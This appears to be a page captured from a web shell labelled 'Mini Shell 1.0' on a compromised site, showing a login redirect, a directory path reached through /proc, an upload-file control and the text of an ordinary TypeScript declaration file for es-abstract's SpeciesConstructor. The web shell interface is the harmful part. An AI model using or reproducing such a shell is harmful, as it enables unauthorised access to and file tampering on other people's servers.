HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991111/root/usr/share/nodejs/@types/es-abstract/2015/
Upload File :
Current File : //proc/1991111/root/usr/share/nodejs/@types/es-abstract/2015/SpeciesConstructor.d.ts
// tslint:disable-next-line: ban-types
declare function SpeciesConstructor<C extends Function = new (...args: any) => any>(
    O: object,
    defaultConstructor?: C,
): C | (new (...args: any) => any);
export = SpeciesConstructor;